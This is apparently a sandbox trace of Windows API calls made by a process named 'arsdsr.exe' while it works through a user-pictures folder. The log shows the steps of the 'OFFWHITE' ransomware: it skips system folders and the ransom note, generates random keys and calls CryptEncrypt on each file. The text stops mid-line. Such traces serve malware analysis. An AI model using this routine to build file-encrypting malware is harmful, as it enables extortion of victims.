[0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.776] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.776] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.776] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.776] lstrcmpiW (lpString1="usertile31.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.776] GetProcessHeap () returned 0x500000 [0146.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470f8 [0146.776] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.776] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.776] GetProcessHeap () returned 0x500000 [0146.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5267c0 [0146.776] GetProcessHeap () returned 0x500000 [0146.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5267d8 [0146.776] GetProcessHeap () returned 0x500000 [0146.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563440 [0146.776] GetProcessHeap () returned 0x500000 [0146.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563548 [0146.776] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.776] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.776] SystemFunction036 (in: RandomBuffer=0x5267c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5267c0) returned 1 [0146.776] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.776] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.776] SystemFunction036 (in: RandomBuffer=0x5267d8, RandomBufferLength=0x10 | out: RandomBuffer=0x5267d8) returned 1 [0146.777] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.777] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.777] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563440*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563440*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.777] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.777] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.777] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563548*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563548*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.777] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.777] SetLastError (dwErrCode=0x0) [0146.777] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.777] GetLastError () returned 0x6 [0146.777] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2=".") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="..") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="...") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="windows") returned -1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="$recycle.bin") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="rsa") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="ntuser.dat") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="programdata") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="appdata") returned 1 [0146.777] lstrcmpiW (lpString1="usertile32.bmp", lpString2="program files") returned 1 [0146.778] lstrcmpiW (lpString1="usertile32.bmp", lpString2="program files (x86)") returned 1 [0146.778] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.778] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile32.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" [0146.778] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.778] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.778] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.778] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.778] lstrcmpiW (lpString1="usertile32.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.778] GetProcessHeap () returned 0x500000 [0146.778] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547108 [0146.778] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.779] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.779] GetProcessHeap () returned 0x500000 [0146.779] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5267f0 [0146.779] GetProcessHeap () returned 0x500000 [0146.779] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526808 [0146.779] GetProcessHeap () returned 0x500000 [0146.779] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563650 [0146.779] GetProcessHeap () returned 0x500000 [0146.779] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563758 [0146.779] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.779] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.779] SystemFunction036 (in: RandomBuffer=0x5267f0, RandomBufferLength=0x10 | out: RandomBuffer=0x5267f0) returned 1 [0146.779] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.779] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.779] SystemFunction036 (in: RandomBuffer=0x526808, RandomBufferLength=0x10 | out: RandomBuffer=0x526808) returned 1 [0146.779] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.779] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.779] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563650*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563650*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.780] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.780] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.780] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563758*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563758*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.780] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.780] SetLastError (dwErrCode=0x0) [0146.780] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.780] GetLastError () returned 0x6 [0146.780] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="..") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="...") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="windows") returned -1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="$recycle.bin") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="rsa") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="ntuser.dat") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="programdata") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="appdata") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="program files") returned 1 [0146.780] lstrcmpiW (lpString1="usertile33.bmp", lpString2="program files (x86)") returned 1 [0146.780] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.781] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile33.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" [0146.781] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.781] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.781] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.781] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.781] lstrcmpiW (lpString1="usertile33.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.781] GetProcessHeap () returned 0x500000 [0146.781] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547118 [0146.781] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.782] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.782] GetProcessHeap () returned 0x500000 [0146.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526820 [0146.782] GetProcessHeap () returned 0x500000 [0146.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526838 [0146.782] GetProcessHeap () returned 0x500000 [0146.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563860 [0146.782] GetProcessHeap () returned 0x500000 [0146.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563968 [0146.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.782] SystemFunction036 (in: RandomBuffer=0x526820, RandomBufferLength=0x10 | out: RandomBuffer=0x526820) returned 1 [0146.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.782] SystemFunction036 (in: RandomBuffer=0x526838, RandomBufferLength=0x10 | out: RandomBuffer=0x526838) returned 1 [0146.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.782] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563860*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563860*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.783] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.783] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.783] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563968*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563968*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.783] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.783] SetLastError (dwErrCode=0x0) [0146.783] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.783] GetLastError () returned 0x6 [0146.783] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2=".") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="..") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="...") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="windows") returned -1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="$recycle.bin") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="rsa") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="ntuser.dat") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="programdata") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="appdata") returned 1 [0146.783] lstrcmpiW (lpString1="usertile34.bmp", lpString2="program files") returned 1 [0146.784] lstrcmpiW (lpString1="usertile34.bmp", lpString2="program files (x86)") returned 1 [0146.784] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.784] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile34.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" [0146.784] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.784] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.784] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.784] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.784] lstrcmpiW (lpString1="usertile34.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.784] GetProcessHeap () returned 0x500000 [0146.784] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547128 [0146.784] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.788] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.788] GetProcessHeap () returned 0x500000 [0146.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526850 [0146.788] GetProcessHeap () returned 0x500000 [0146.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526868 [0146.788] GetProcessHeap () returned 0x500000 [0146.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563a70 [0146.788] GetProcessHeap () returned 0x500000 [0146.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563b78 [0146.788] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.788] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.788] SystemFunction036 (in: RandomBuffer=0x526850, RandomBufferLength=0x10 | out: RandomBuffer=0x526850) returned 1 [0146.788] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.788] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.788] SystemFunction036 (in: RandomBuffer=0x526868, RandomBufferLength=0x10 | out: RandomBuffer=0x526868) returned 1 [0146.788] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.788] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.789] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563a70*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563a70*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.789] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563b78*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563b78*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.789] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.789] SetLastError (dwErrCode=0x0) [0146.789] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563a70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.789] GetLastError () returned 0x6 [0146.789] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="..") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="...") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="windows") returned -1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="$recycle.bin") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="rsa") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="ntuser.dat") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="programdata") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="appdata") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="program files") returned 1 [0146.789] lstrcmpiW (lpString1="usertile35.bmp", lpString2="program files (x86)") returned 1 [0146.789] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.790] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile35.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" [0146.790] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.790] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.790] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.790] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.790] lstrcmpiW (lpString1="usertile35.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.790] GetProcessHeap () returned 0x500000 [0146.790] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547138 [0146.790] CreateFileW (lpFileName="C:/Users\\All 